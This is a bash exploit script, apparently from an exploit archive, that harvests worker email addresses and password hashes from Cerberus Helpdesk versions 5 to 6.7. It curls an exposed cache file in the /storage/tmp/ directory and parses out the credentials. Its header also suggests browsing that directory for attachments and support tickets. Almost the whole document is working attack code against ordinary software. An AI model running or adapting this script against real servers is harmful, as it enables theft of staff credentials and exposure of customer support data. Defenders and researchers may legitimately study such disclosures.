erberus Helpdesk (Cerb5) Password Hash Grabbing

1. #!/bin/bash
2. #####################################################################################
3. # Exploit Title: Cerberus Helpdesk (Cerb5) Password Hash Grabbing #
4. # Date: 04.02.2016 #
5. # Exploit Author: asdizzle_ #
6. # Vendor Homepage: http://www.cerberusweb.com/ #
7. # Software Link: http://www.cerberusweb.com/downloads/cerb5/archive/cerb5-5_4_4.zip #
8. # Version: 5 - 6.7 #
9. # Tested on: Debian 8 / apache2 with cerb 5 #
10. #####################################################################################
11. # Prerequisites: #
12. # -At least one worker must be logged in #
13. # -/storage/tmp/ dir must be accessible #
14. # #
15. # If everything else fails try if there's directory listing in /storage/tmp #
16. # You might find attachments and even support tickets. #
17. #####################################################################################
18.  
19. url='http://172.16.15.137/cerb5/5.4.4' # Full url (without /index.php/ !)
20. pre='devblocks' # If this doesn't work try 'zend'
21.  
22. echo "[*] Trying to fetch cache file"
23.  
24. cachechk=$(curl -s $url"/storage/tmp/"$pre"_cache---ch_workers" | grep pass)
25. if [ -z "$cachechk" ];then
26. echo "[-] File not found."
27. exit
28. else
29. echo "[+] Found. Extracting..."
30. hashes=$(echo "$cachechk" | sed -e 's/s:5/\n/g' | grep email | cut -d '"' -f4,8 | sed 's/"/:/g')
31. if [ -z "$hashes" ];then
32. echo "[-] Hash extracting failed"
33. else
34. echo "[+] Extracting seems to have worked"
35. echo
36. echo "$hashes"
37. fi
38. fi